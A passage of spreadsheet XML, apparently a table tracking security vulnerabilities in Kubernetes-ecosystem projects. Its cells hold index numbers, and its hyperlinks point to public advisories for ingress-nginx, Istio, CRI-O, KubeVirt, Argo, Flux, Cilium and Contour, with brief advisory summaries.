      <c r="Y38" s="6" t="s">
        <v>84</v>
      </c>
      <c r="Z38" s="6" t="s">
        <v>74</v>
      </c>
      <c r="AA38" s="6"/>
      <c r="AB38" s="6" t="s">
        <v>829</v>
      </c>
      <c r="AC38" s="6" t="s">
        <v>744</v>
      </c>
      <c r="AD38" s="6" t="s">
        <v>117</v>
      </c>
      <c r="AE38" s="6" t="s">
        <v>84</v>
      </c>
      <c r="AF38" s="6" t="s">
        <v>118</v>
      </c>
      <c r="AG38" s="6" t="s">
        <v>119</v>
      </c>
      <c r="AH38" s="6" t="s">
        <v>746</v>
      </c>
      <c r="AI38" s="6"/>
      <c r="AJ38" s="6"/>
      <c r="AK38" s="6" t="s">
        <v>70</v>
      </c>
      <c r="AL38" s="6" t="s">
        <v>830</v>
      </c>
      <c r="AM38" s="6" t="s">
        <v>831</v>
      </c>
      <c r="AN38" s="6"/>
      <c r="AO38" s="6" t="s">
        <v>832</v>
      </c>
      <c r="AP38" s="6"/>
      <c r="AQ38" s="6" t="s">
        <v>221</v>
      </c>
      <c r="AR38" s="6" t="s">
        <v>795</v>
      </c>
      <c r="AS38" s="6" t="s">
        <v>167</v>
      </c>
      <c r="AT38" s="6"/>
      <c r="AU38" s="5" t="s">
        <v>239</v>
      </c>
      <c r="AV38" s="5" t="s">
        <v>1321</v>
      </c>
      <c r="AW38" s="5" t="s">
        <v>94</v>
      </c>
      <c r="AX38" s="5" t="s">
        <v>563</v>
      </c>
      <c r="AY38" s="5" t="s">
        <v>834</v>
      </c>
      <c r="BA38" s="5" t="s">
        <v>835</v>
      </c>
      <c r="BB38" s="5" t="s">
        <v>836</v>
      </c>
      <c r="BC38" s="5" t="s">
        <v>1322</v>
      </c>
      <c r="BD38" s="5" t="s">
        <v>838</v>
      </c>
      <c r="BE38" s="5" t="s">
        <v>1323</v>
      </c>
      <c r="BF38" s="5" t="s">
        <v>840</v>
      </c>
      <c r="BG38" s="5" t="s">
        <v>841</v>
      </c>
    </row>
    <row r="39" s="5" customFormat="1" ht="202.5" spans="1:56">
      <c r="A39" s="6" t="s">
        <v>852</v>
      </c>
      <c r="B39" s="6" t="s">
        <v>852</v>
      </c>
      <c r="C39" s="7" t="s">
        <v>1324</v>
      </c>
      <c r="D39" s="7" t="s">
        <v>1325</v>
      </c>
      <c r="E39" s="7" t="s">
        <v>1326</v>
      </c>
      <c r="F39" s="5" t="s">
        <v>861</v>
      </c>
      <c r="G39" s="7" t="s">
        <v>1327</v>
      </c>
      <c r="H39" s="6" t="s">
        <v>853</v>
      </c>
      <c r="I39" s="6" t="s">
        <v>283</v>
      </c>
      <c r="J39" s="6" t="s">
        <v>1328</v>
      </c>
      <c r="K39" s="6" t="s">
        <v>856</v>
      </c>
      <c r="L39" s="6" t="s">
        <v>857</v>
      </c>
      <c r="M39" s="6" t="s">
        <v>234</v>
      </c>
      <c r="N39" s="6" t="s">
        <v>858</v>
      </c>
      <c r="O39" s="6" t="s">
        <v>859</v>
      </c>
      <c r="P39" s="6" t="s">
        <v>860</v>
      </c>
      <c r="Q39" s="6"/>
      <c r="R39" s="5" t="s">
        <v>67</v>
      </c>
      <c r="S39" s="6" t="s">
        <v>68</v>
      </c>
      <c r="T39" s="6" t="s">
        <v>237</v>
      </c>
      <c r="U39" s="6" t="s">
        <v>70</v>
      </c>
      <c r="V39" s="5" t="s">
        <v>159</v>
      </c>
      <c r="W39" s="6" t="s">
        <v>1329</v>
      </c>
      <c r="X39" s="6" t="s">
        <v>72</v>
      </c>
      <c r="Y39" s="6"/>
      <c r="Z39" s="6" t="s">
        <v>74</v>
      </c>
      <c r="AA39" s="6"/>
      <c r="AB39" s="6"/>
      <c r="AC39" s="6"/>
      <c r="AD39" s="6" t="s">
        <v>862</v>
      </c>
      <c r="AM39" s="6"/>
      <c r="AN39" s="6"/>
      <c r="AO39" s="6"/>
      <c r="AP39" s="6"/>
      <c r="AQ39" s="5" t="s">
        <v>221</v>
      </c>
      <c r="AR39" s="6"/>
      <c r="AS39" s="6"/>
      <c r="AT39" s="6"/>
      <c r="AU39" s="5" t="s">
        <v>270</v>
      </c>
      <c r="AV39" s="5" t="s">
        <v>863</v>
      </c>
      <c r="BC39" s="5" t="s">
        <v>864</v>
      </c>
      <c r="BD39" s="5" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="40" s="5" customFormat="1" ht="382.5" spans="1:56">
      <c r="A40" s="6" t="s">
        <v>865</v>
      </c>
      <c r="B40" s="6" t="s">
        <v>865</v>
      </c>
      <c r="C40" s="7" t="s">
        <v>1330</v>
      </c>
      <c r="D40" s="7" t="s">
        <v>1331</v>
      </c>
      <c r="E40" s="7" t="s">
        <v>1332</v>
      </c>
      <c r="F40" s="5" t="s">
        <v>1333</v>
      </c>
      <c r="G40" s="7" t="s">
        <v>1334</v>
      </c>
      <c r="H40" s="6" t="s">
        <v>866</v>
      </c>
      <c r="I40" s="6" t="s">
        <v>867</v>
      </c>
      <c r="J40" s="6" t="s">
        <v>868</v>
      </c>
      <c r="K40" s="6" t="s">
        <v>870</v>
      </c>
      <c r="L40" s="6" t="s">
        <v>871</v>
      </c>
      <c r="M40" s="6" t="s">
        <v>872</v>
      </c>
      <c r="N40" s="6" t="s">
        <v>873</v>
      </c>
      <c r="O40" s="6" t="s">
        <v>1335</v>
      </c>
      <c r="P40" s="6" t="s">
        <v>396</v>
      </c>
      <c r="Q40" s="6" t="s">
        <v>1185</v>
      </c>
      <c r="R40" s="6"/>
      <c r="S40" s="6"/>
      <c r="T40" s="6"/>
      <c r="U40" s="6" t="s">
        <v>875</v>
      </c>
      <c r="V40" s="5" t="s">
        <v>159</v>
      </c>
      <c r="W40" s="6" t="s">
        <v>1329</v>
      </c>
      <c r="X40" s="6" t="s">
        <v>72</v>
      </c>
      <c r="Y40" s="6"/>
      <c r="Z40" s="6" t="s">
        <v>319</v>
      </c>
      <c r="AA40" s="6"/>
      <c r="AB40" s="6"/>
      <c r="AC40" s="6"/>
      <c r="AD40" s="6" t="s">
        <v>117</v>
      </c>
      <c r="AM40" s="6"/>
      <c r="AN40" s="6"/>
      <c r="AO40" s="6"/>
      <c r="AP40" s="6"/>
      <c r="AR40" s="6"/>
      <c r="AS40" s="6"/>
      <c r="AT40" s="6"/>
      <c r="AU40" s="5" t="s">
        <v>239</v>
      </c>
      <c r="AV40" s="5" t="s">
        <v>1336</v>
      </c>
      <c r="BC40" s="5" t="s">
        <v>293</v>
      </c>
      <c r="BD40" s="5" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="41" s="5" customFormat="1" ht="409.5" spans="1:56">
      <c r="A41" s="6" t="s">
        <v>878</v>
      </c>
      <c r="B41" s="6" t="s">
        <v>878</v>
      </c>
      <c r="C41" s="7" t="s">
        <v>1337</v>
      </c>
      <c r="D41" s="7" t="s">
        <v>1338</v>
      </c>
      <c r="E41" s="7" t="s">
        <v>1339</v>
      </c>
      <c r="F41" s="5" t="s">
        <v>887</v>
      </c>
      <c r="G41" s="7" t="s">
        <v>1340</v>
      </c>
      <c r="H41" s="6" t="s">
        <v>879</v>
      </c>
      <c r="I41" s="6" t="s">
        <v>880</v>
      </c>
      <c r="J41" s="6" t="s">
        <v>1341</v>
      </c>
      <c r="K41" s="6" t="s">
        <v>1342</v>
      </c>
      <c r="L41" s="6" t="s">
        <v>884</v>
      </c>
      <c r="M41" s="5" t="s">
        <v>872</v>
      </c>
      <c r="N41" s="6" t="s">
        <v>885</v>
      </c>
      <c r="O41" s="6" t="s">
        <v>886</v>
      </c>
      <c r="P41" s="5" t="s">
        <v>396</v>
      </c>
      <c r="Q41" s="6" t="s">
        <v>1185</v>
      </c>
      <c r="R41" s="6" t="s">
        <v>253</v>
      </c>
      <c r="S41" s="6"/>
      <c r="T41" s="6"/>
      <c r="U41" s="6" t="s">
        <v>70</v>
      </c>
      <c r="V41" s="5" t="s">
        <v>159</v>
      </c>
      <c r="W41" s="6" t="s">
        <v>1136</v>
      </c>
      <c r="X41" s="6" t="s">
        <v>72</v>
      </c>
      <c r="Y41" s="6"/>
      <c r="Z41" s="6" t="s">
        <v>319</v>
      </c>
      <c r="AA41" s="6"/>
      <c r="AB41" s="6"/>
      <c r="AC41" s="6"/>
      <c r="AD41" s="6" t="s">
        <v>117</v>
      </c>
      <c r="AM41" s="6"/>
      <c r="AN41" s="6"/>
      <c r="AO41" s="6"/>
      <c r="AP41" s="6"/>
      <c r="AQ41" s="5" t="s">
        <v>221</v>
      </c>
      <c r="AR41" s="6"/>
      <c r="AS41" s="6"/>
      <c r="AT41" s="6"/>
      <c r="AU41" s="5" t="s">
        <v>239</v>
      </c>
      <c r="AV41" s="5" t="s">
        <v>1343</v>
      </c>
      <c r="BC41" s="5" t="s">
        <v>889</v>
      </c>
      <c r="BD41" s="5" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="42" s="5" customFormat="1" ht="409.5" spans="1:56">
      <c r="A42" s="6" t="s">
        <v>890</v>
      </c>
      <c r="B42" s="6" t="s">
        <v>890</v>
      </c>
      <c r="C42" s="7" t="s">
        <v>1344</v>
      </c>
      <c r="D42" s="7" t="s">
        <v>1345</v>
      </c>
      <c r="E42" s="7" t="s">
        <v>1346</v>
      </c>
      <c r="F42" s="5" t="s">
        <v>900</v>
      </c>
      <c r="G42" s="7" t="s">
        <v>1347</v>
      </c>
      <c r="H42" s="6" t="s">
        <v>891</v>
      </c>
      <c r="I42" s="6" t="s">
        <v>283</v>
      </c>
      <c r="J42" s="6" t="s">
        <v>892</v>
      </c>
      <c r="K42" s="6" t="s">
        <v>894</v>
      </c>
      <c r="L42" s="15" t="s">
        <v>895</v>
      </c>
      <c r="M42" s="6" t="s">
        <v>896</v>
      </c>
      <c r="N42" s="6" t="s">
        <v>897</v>
      </c>
      <c r="O42" s="6" t="s">
        <v>1348</v>
      </c>
      <c r="P42" s="6" t="s">
        <v>791</v>
      </c>
      <c r="Q42" s="6"/>
      <c r="R42" s="6"/>
      <c r="S42" s="6" t="s">
        <v>368</v>
      </c>
      <c r="T42" s="6" t="s">
        <v>69</v>
      </c>
      <c r="U42" s="6" t="s">
        <v>70</v>
      </c>
      <c r="V42" s="5" t="s">
        <v>159</v>
      </c>
      <c r="W42" s="6" t="s">
        <v>1128</v>
      </c>
      <c r="X42" s="6" t="s">
        <v>72</v>
      </c>
      <c r="Y42" s="6"/>
      <c r="Z42" s="6" t="s">
        <v>899</v>
      </c>
      <c r="AA42" s="6"/>
      <c r="AB42" s="6"/>
      <c r="AC42" s="6"/>
      <c r="AD42" s="6" t="s">
        <v>117</v>
      </c>
      <c r="AM42" s="6"/>
      <c r="AN42" s="6"/>
      <c r="AO42" s="6"/>
      <c r="AP42" s="6"/>
      <c r="AR42" s="6"/>
      <c r="AS42" s="6"/>
      <c r="AT42" s="6"/>
      <c r="AU42" s="5" t="s">
        <v>901</v>
      </c>
      <c r="AV42" s="5" t="s">
        <v>902</v>
      </c>
      <c r="BC42" s="5" t="s">
        <v>293</v>
      </c>
      <c r="BD42" s="5" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="43" s="11" customFormat="1" ht="409.5" spans="1:56">
      <c r="A43" s="11" t="s">
        <v>934</v>
      </c>
      <c r="B43" s="11" t="s">
        <v>934</v>
      </c>
      <c r="C43" s="7" t="s">
        <v>1349</v>
      </c>
      <c r="D43" s="7" t="s">
        <v>1350</v>
      </c>
      <c r="E43" s="7" t="s">
        <v>1351</v>
      </c>
      <c r="F43" s="11" t="s">
        <v>943</v>
      </c>
      <c r="G43" s="7" t="s">
        <v>1352</v>
      </c>
      <c r="H43" s="11" t="s">
        <v>1353</v>
      </c>
      <c r="I43" s="11" t="s">
        <v>283</v>
      </c>
      <c r="J43" s="11" t="s">
        <v>936</v>
      </c>
      <c r="K43" s="11" t="s">
        <v>938</v>
      </c>
      <c r="L43" s="11" t="s">
        <v>939</v>
      </c>
      <c r="M43" s="11" t="s">
        <v>940</v>
      </c>
      <c r="N43" s="11" t="s">
        <v>941</v>
      </c>
      <c r="O43" s="11" t="s">
        <v>942</v>
      </c>
      <c r="P43" s="11" t="s">
        <v>367</v>
      </c>
      <c r="S43" s="11" t="s">
        <v>68</v>
      </c>
      <c r="T43" s="11" t="s">
        <v>237</v>
      </c>
      <c r="U43" s="11" t="s">
        <v>70</v>
      </c>
      <c r="V43" s="11" t="s">
        <v>159</v>
      </c>
      <c r="W43" s="12" t="s">
        <v>1270</v>
      </c>
      <c r="X43" s="12" t="s">
        <v>72</v>
      </c>
      <c r="Z43" s="11" t="s">
        <v>899</v>
      </c>
      <c r="AD43" s="11" t="s">
        <v>117</v>
      </c>
      <c r="AV43" s="11" t="s">
        <v>901</v>
      </c>
      <c r="BD43" s="11" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="44" s="11" customFormat="1" ht="409.5" spans="1:56">
      <c r="A44" s="12" t="s">
        <v>1354</v>
      </c>
      <c r="B44" s="11" t="s">
        <v>1355</v>
      </c>
      <c r="C44" s="7" t="s">
        <v>1356</v>
      </c>
      <c r="D44" s="7" t="s">
        <v>1357</v>
      </c>
      <c r="E44" s="7" t="s">
        <v>1358</v>
      </c>
      <c r="F44" s="11" t="s">
        <v>954</v>
      </c>
      <c r="G44" s="7"/>
      <c r="H44" s="11" t="s">
        <v>945</v>
      </c>
      <c r="I44" s="12" t="s">
        <v>283</v>
      </c>
      <c r="J44" s="12" t="s">
        <v>1359</v>
      </c>
      <c r="K44" s="11" t="s">
        <v>948</v>
      </c>
      <c r="L44" s="12" t="s">
        <v>949</v>
      </c>
      <c r="M44" s="11" t="s">
        <v>950</v>
      </c>
      <c r="N44" s="11" t="s">
        <v>951</v>
      </c>
      <c r="O44" s="11" t="s">
        <v>952</v>
      </c>
      <c r="P44" s="11" t="s">
        <v>367</v>
      </c>
      <c r="Q44" s="12"/>
      <c r="R44" s="12"/>
      <c r="S44" s="12" t="s">
        <v>368</v>
      </c>
      <c r="T44" s="12" t="s">
        <v>69</v>
      </c>
      <c r="U44" s="12" t="s">
        <v>953</v>
      </c>
      <c r="V44" s="11" t="s">
        <v>159</v>
      </c>
      <c r="W44" s="12" t="s">
        <v>1100</v>
      </c>
      <c r="X44" s="12" t="s">
        <v>72</v>
      </c>
      <c r="Y44" s="12"/>
      <c r="Z44" s="12" t="s">
        <v>74</v>
      </c>
      <c r="AD44" s="11" t="s">
        <v>332</v>
      </c>
      <c r="AU44" s="11" t="s">
        <v>92</v>
      </c>
      <c r="AV44" s="11" t="s">
        <v>955</v>
      </c>
      <c r="BC44" s="11" t="s">
        <v>293</v>
      </c>
      <c r="BD44" s="11" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="45" s="5" customFormat="1" ht="409.5" spans="1:60">
      <c r="A45" s="5" t="s">
        <v>956</v>
      </c>
      <c r="B45" s="31" t="s">
        <v>1360</v>
      </c>
      <c r="C45" s="31" t="s">
        <v>1361</v>
      </c>
      <c r="D45" s="31" t="s">
        <v>1362</v>
      </c>
      <c r="E45" s="31" t="s">
        <v>1363</v>
      </c>
      <c r="F45" s="5" t="s">
        <v>963</v>
      </c>
      <c r="G45" s="31" t="s">
        <v>1364</v>
      </c>
      <c r="H45" s="5" t="s">
        <v>957</v>
      </c>
      <c r="I45" s="5" t="s">
        <v>486</v>
      </c>
      <c r="J45" s="5" t="s">
        <v>1365</v>
      </c>
      <c r="L45" s="5" t="s">
        <v>960</v>
      </c>
      <c r="M45" s="5" t="s">
        <v>63</v>
      </c>
      <c r="N45" s="5" t="s">
        <v>961</v>
      </c>
      <c r="O45" s="5" t="s">
        <v>1366</v>
      </c>
      <c r="P45" s="5" t="s">
        <v>145</v>
      </c>
      <c r="R45" s="5" t="s">
        <v>67</v>
      </c>
      <c r="S45" s="5" t="s">
        <v>68</v>
      </c>
      <c r="T45" s="5" t="s">
        <v>463</v>
      </c>
      <c r="U45" s="5" t="s">
        <v>70</v>
      </c>
      <c r="V45" s="5" t="s">
        <v>159</v>
      </c>
      <c r="W45" s="5" t="s">
        <v>1367</v>
      </c>
      <c r="X45" s="5" t="s">
        <v>72</v>
      </c>
      <c r="Z45" s="5" t="s">
        <v>74</v>
      </c>
      <c r="AA45" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="AB45" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AC45" s="5" t="s">
        <v>964</v>
      </c>
      <c r="AD45" s="5" t="s">
        <v>147</v>
      </c>
      <c r="AH45" s="5" t="s">
        <v>81</v>
      </c>
      <c r="AI45" s="5" t="s">
        <v>965</v>
      </c>
      <c r="AO45" s="5" t="s">
        <v>966</v>
      </c>
      <c r="AU45" s="5" t="s">
        <v>775</v>
      </c>
      <c r="AV45" s="5" t="s">
        <v>92</v>
      </c>
      <c r="AW45" s="5" t="s">
        <v>967</v>
      </c>
      <c r="BB45" s="5" t="s">
        <v>968</v>
      </c>
      <c r="BC45" s="5" t="s">
        <v>969</v>
      </c>
      <c r="BD45" s="5" t="s">
        <v>970</v>
      </c>
      <c r="BE45" s="5" t="s">
        <v>971</v>
      </c>
      <c r="BF45" s="5" t="s">
        <v>972</v>
      </c>
      <c r="BH45" s="5" t="s">
        <v>973</v>
      </c>
    </row>
    <row r="46" s="5" customFormat="1" ht="409.5" spans="1:60">
      <c r="A46" s="5" t="s">
        <v>974</v>
      </c>
      <c r="B46" s="6" t="s">
        <v>1368</v>
      </c>
      <c r="C46" s="31" t="s">
        <v>1369</v>
      </c>
      <c r="D46" s="31" t="s">
        <v>1370</v>
      </c>
      <c r="E46" s="31" t="s">
        <v>1371</v>
      </c>
      <c r="F46" s="5" t="s">
        <v>1372</v>
      </c>
      <c r="G46" s="31" t="s">
        <v>1373</v>
      </c>
      <c r="H46" s="5" t="s">
        <v>957</v>
      </c>
      <c r="I46" s="5" t="s">
        <v>486</v>
      </c>
      <c r="J46" s="5" t="s">
        <v>1374</v>
      </c>
      <c r="K46" s="14" t="s">
        <v>976</v>
      </c>
      <c r="L46" s="5" t="s">
        <v>977</v>
      </c>
      <c r="M46" s="5" t="s">
        <v>63</v>
      </c>
      <c r="N46" s="5" t="s">
        <v>961</v>
      </c>
      <c r="O46" s="5" t="s">
        <v>1366</v>
      </c>
      <c r="P46" s="5" t="s">
        <v>145</v>
      </c>
      <c r="R46" s="5" t="s">
        <v>67</v>
      </c>
      <c r="S46" s="5" t="s">
        <v>68</v>
      </c>
      <c r="T46" s="5" t="s">
        <v>463</v>
      </c>
      <c r="U46" s="5" t="s">
        <v>70</v>
      </c>
      <c r="V46" s="5" t="s">
        <v>159</v>
      </c>
      <c r="W46" s="5" t="s">
        <v>1367</v>
      </c>
      <c r="X46" s="5" t="s">
        <v>72</v>
      </c>
      <c r="Z46" s="5" t="s">
        <v>74</v>
      </c>
      <c r="AA46" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="AB46" s="5" t="s">
        <v>84</v>
      </c>
      <c r="AD46" s="5" t="s">
        <v>979</v>
      </c>
      <c r="AH46" s="5" t="s">
        <v>81</v>
      </c>
      <c r="AI46" s="5" t="s">
        <v>965</v>
      </c>
      <c r="AO46" s="5" t="s">
        <v>980</v>
      </c>
      <c r="AU46" s="5" t="s">
        <v>775</v>
      </c>
      <c r="AV46" s="5" t="s">
        <v>92</v>
      </c>
      <c r="AW46" s="5" t="s">
        <v>967</v>
      </c>
      <c r="BC46" s="5" t="s">
        <v>981</v>
      </c>
      <c r="BD46" s="5" t="s">
        <v>982</v>
      </c>
      <c r="BE46" s="5" t="s">
        <v>983</v>
      </c>
      <c r="BF46" s="5" t="s">
        <v>984</v>
      </c>
      <c r="BH46" s="5" t="s">
        <v>973</v>
      </c>
    </row>
    <row r="47" s="5" customFormat="1" ht="409.5" spans="1:60">
      <c r="A47" s="5" t="s">
        <v>985</v>
      </c>
      <c r="B47" s="6" t="s">
        <v>1375</v>
      </c>
      <c r="C47" s="31" t="s">
        <v>1376</v>
      </c>
      <c r="D47" s="31" t="s">
        <v>1377</v>
      </c>
      <c r="E47" s="31" t="s">
        <v>1378</v>
      </c>
      <c r="F47" s="5" t="s">
        <v>990</v>
      </c>
      <c r="G47" s="31" t="s">
        <v>1379</v>
      </c>
      <c r="H47" s="5" t="s">
        <v>957</v>
      </c>
      <c r="I47" s="5" t="s">
        <v>486</v>
      </c>
      <c r="J47" s="5" t="s">
        <v>1380</v>
      </c>
      <c r="K47" s="14" t="s">
        <v>988</v>
      </c>
      <c r="L47" s="5" t="s">
        <v>989</v>
      </c>
      <c r="M47" s="5" t="s">
        <v>63</v>
      </c>
      <c r="N47" s="5" t="s">
        <v>961</v>
      </c>
      <c r="O47" s="5" t="s">
        <v>1366</v>
      </c>
      <c r="P47" s="5" t="s">
        <v>145</v>
      </c>
      <c r="R47" s="5" t="s">
        <v>67</v>
      </c>
      <c r="S47" s="5" t="s">
        <v>68</v>
      </c>
      <c r="T47" s="5" t="s">
        <v>463</v>
      </c>
      <c r="U47" s="5" t="s">
        <v>70</v>
      </c>
      <c r="V47" s="5" t="s">
        <v>159</v>
      </c>
      <c r="W47" s="5" t="s">
        <v>1367</v>
      </c>
      <c r="X47" s="5" t="s">
        <v>72</v>
      </c>
      <c r="Z47" s="5" t="s">
        <v>74</v>
      </c>
      <c r="AA47" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="AB47" s="5" t="s">
        <v>84</v>
      </c>
      <c r="AD47" s="5" t="s">
        <v>147</v>
      </c>
      <c r="AH47" s="5" t="s">
        <v>81</v>
      </c>
      <c r="AI47" s="5" t="s">
        <v>965</v>
      </c>
      <c r="AO47" s="5" t="s">
        <v>966</v>
      </c>
      <c r="AU47" s="5" t="s">
        <v>775</v>
      </c>
      <c r="AV47" s="5" t="s">
        <v>92</v>
      </c>
      <c r="AW47" s="5" t="s">
        <v>967</v>
      </c>
      <c r="BB47" s="5" t="s">
        <v>151</v>
      </c>
      <c r="BC47" s="5" t="s">
        <v>969</v>
      </c>
      <c r="BD47" s="5" t="s">
        <v>991</v>
      </c>
      <c r="BE47" s="5" t="s">
        <v>971</v>
      </c>
      <c r="BF47" s="5" t="s">
        <v>972</v>
      </c>
      <c r="BH47" s="5" t="s">
        <v>973</v>
      </c>
    </row>
    <row r="48" s="5" customFormat="1" ht="409.5" spans="1:60">
      <c r="A48" s="5" t="s">
        <v>999</v>
      </c>
      <c r="B48" s="6" t="s">
        <v>1381</v>
      </c>
      <c r="C48" s="31" t="s">
        <v>1382</v>
      </c>
      <c r="D48" s="31" t="s">
        <v>1383</v>
      </c>
      <c r="E48" s="31" t="s">
        <v>1384</v>
      </c>
      <c r="F48" s="5" t="s">
        <v>1385</v>
      </c>
      <c r="G48" s="31" t="s">
        <v>1386</v>
      </c>
      <c r="H48" s="5"/>
      <c r="I48" s="5" t="s">
        <v>486</v>
      </c>
      <c r="J48" s="5" t="s">
        <v>1000</v>
      </c>
      <c r="K48" s="5" t="s">
        <v>1002</v>
      </c>
      <c r="L48" s="5" t="s">
        <v>1003</v>
      </c>
      <c r="M48" s="5" t="s">
        <v>63</v>
      </c>
      <c r="N48" s="5" t="s">
        <v>961</v>
      </c>
      <c r="O48" s="5" t="s">
        <v>1387</v>
      </c>
      <c r="P48" s="5" t="s">
        <v>1005</v>
      </c>
      <c r="R48" s="5" t="s">
        <v>1006</v>
      </c>
      <c r="S48" s="5" t="s">
        <v>368</v>
      </c>
      <c r="T48" s="5" t="s">
        <v>540</v>
      </c>
      <c r="U48" s="5" t="s">
        <v>70</v>
      </c>
      <c r="V48" s="5" t="s">
        <v>159</v>
      </c>
      <c r="W48" s="5" t="s">
        <v>1367</v>
      </c>
      <c r="X48" s="5" t="s">
        <v>72</v>
      </c>
      <c r="Y48" s="5" t="s">
        <v>84</v>
      </c>
      <c r="Z48" s="5" t="s">
        <v>74</v>
      </c>
      <c r="AA48" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="AB48" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AC48" s="5" t="s">
        <v>744</v>
      </c>
      <c r="AD48" s="5" t="s">
        <v>979</v>
      </c>
      <c r="AE48" s="5" t="s">
        <v>84</v>
      </c>
      <c r="AF48" s="5" t="s">
        <v>118</v>
      </c>
      <c r="AG48" s="5" t="s">
        <v>119</v>
      </c>
      <c r="AH48" s="5" t="s">
        <v>81</v>
      </c>
      <c r="AI48" s="5" t="s">
        <v>1008</v>
      </c>
      <c r="AK48" s="5" t="s">
        <v>84</v>
      </c>
      <c r="AU48" s="5" t="s">
        <v>239</v>
      </c>
      <c r="AV48" s="5" t="s">
        <v>383</v>
      </c>
      <c r="AW48" s="5" t="s">
        <v>967</v>
      </c>
      <c r="BB48" s="5" t="s">
        <v>1009</v>
      </c>
      <c r="BC48" s="5" t="s">
        <v>1010</v>
      </c>
      <c r="BD48" s="5" t="s">
        <v>1011</v>
      </c>
      <c r="BE48" s="5" t="s">
        <v>1012</v>
      </c>
      <c r="BF48" s="5" t="s">
        <v>512</v>
      </c>
      <c r="BG48" s="5" t="s">
        <v>482</v>
      </c>
      <c r="BH48" s="5" t="s">
        <v>1013</v>
      </c>
    </row>
    <row r="1048576" customFormat="1" ht="13.5"/>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="A1:XFC1048576" etc:filterBottomFollowUsedRange="0">
    <extLst/>
  </autoFilter>
  <hyperlinks>
    <hyperlink ref="L9" r:id="rId1" display="&#10;nginx-ingress:&#10;k8s: https://github.com/kubernetes/kubernetes/issues/126811" tooltip="https://github.com/kubernetes/kubernetes/issues/126811"/>
    <hyperlink ref="J8" r:id="rId2" display="Ingress-nginx path can be pointed to service account token file：A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the spec.rules[].http.paths[].path field of an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster." tooltip="https://github.com/kubernetes/ingress-nginx"/>
    <hyperlink ref="L8" r:id="rId3" display="https://github.com/kubernetes/kubernetes/issues/126812" tooltip="https://github.com/kubernetes/kubernetes/issues/126812"/>
    <hyperlink ref="J7" r:id="rId2" display="Ingress-nginx directive injection via annotations: A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use .metadata.annotations in an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster." tooltip="https://github.com/kubernetes/ingress-nginx"/>
    <hyperlink ref="L7" r:id="rId4" display="https://github.com/kubernetes/kubernetes/issues/126813" tooltip="https://github.com/kubernetes/kubernetes/issues/126813"/>
    <hyperlink ref="L6" r:id="rId5" display="https://github.com/kubernetes/ingress-nginx/issues/10572" tooltip="https://github.com/kubernetes/ingress-nginx/issues/10572"/>
    <hyperlink ref="L10" r:id="rId6" display="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r" tooltip="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r"/>
    <hyperlink ref="L13" r:id="rId7" display="https://github.com/cri-o/cri-o/security/advisories/GHSA-6x2m-w449-qwx7"/>
    <hyperlink ref="L11" r:id="rId8" display="https://github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j"/>
    <hyperlink ref="K18" r:id="rId9" display="Patched versions&#10;0.55.1&#10;&#10;&#10;https://github.com/kubevirt/kubevirt/pull/8198&#10;https://github.com/kubevirt/kubevirt/pull/8268&#10;&#10;"/>
    <hyperlink ref="K19" r:id="rId10" display="kubevirt 0.30&#10;&#10;https://github.com/kubevirt/kubevirt/pull/3686"/>
    <hyperlink ref="L20" r:id="rId11" display="https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cmv8-6362-r5w9"/>
    <hyperlink ref="L33" r:id="rId12" display="https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7"/>
    <hyperlink ref="L16" r:id="rId13" display="https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww"/>
    <hyperlink ref="L17" r:id="rId14" display="https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc"/>
    <hyperlink ref="L27" r:id="rId15" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-h6h5-6fmq-rh28"/>
    <hyperlink ref="K28" r:id="rId16" display="2.6.1&#10;https://github.com/argoproj/argo-cd/pull/12320/commits/200c3c156e9c27c6c5b197a5be28315e9b802b12"/>
    <hyperlink ref="L28" r:id="rId17" display="https://github.com/argoproj/argo-cd/issues/12309&#10;&#10;https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw"/>
    <hyperlink ref="L25" r:id="rId18" display="https://github.com/argoproj/argo-events/security/advisories/GHSA-qpgx-64h2-gc3c&#10;&#10;https://github.com/argoproj/argo-events/issues/1947"/>
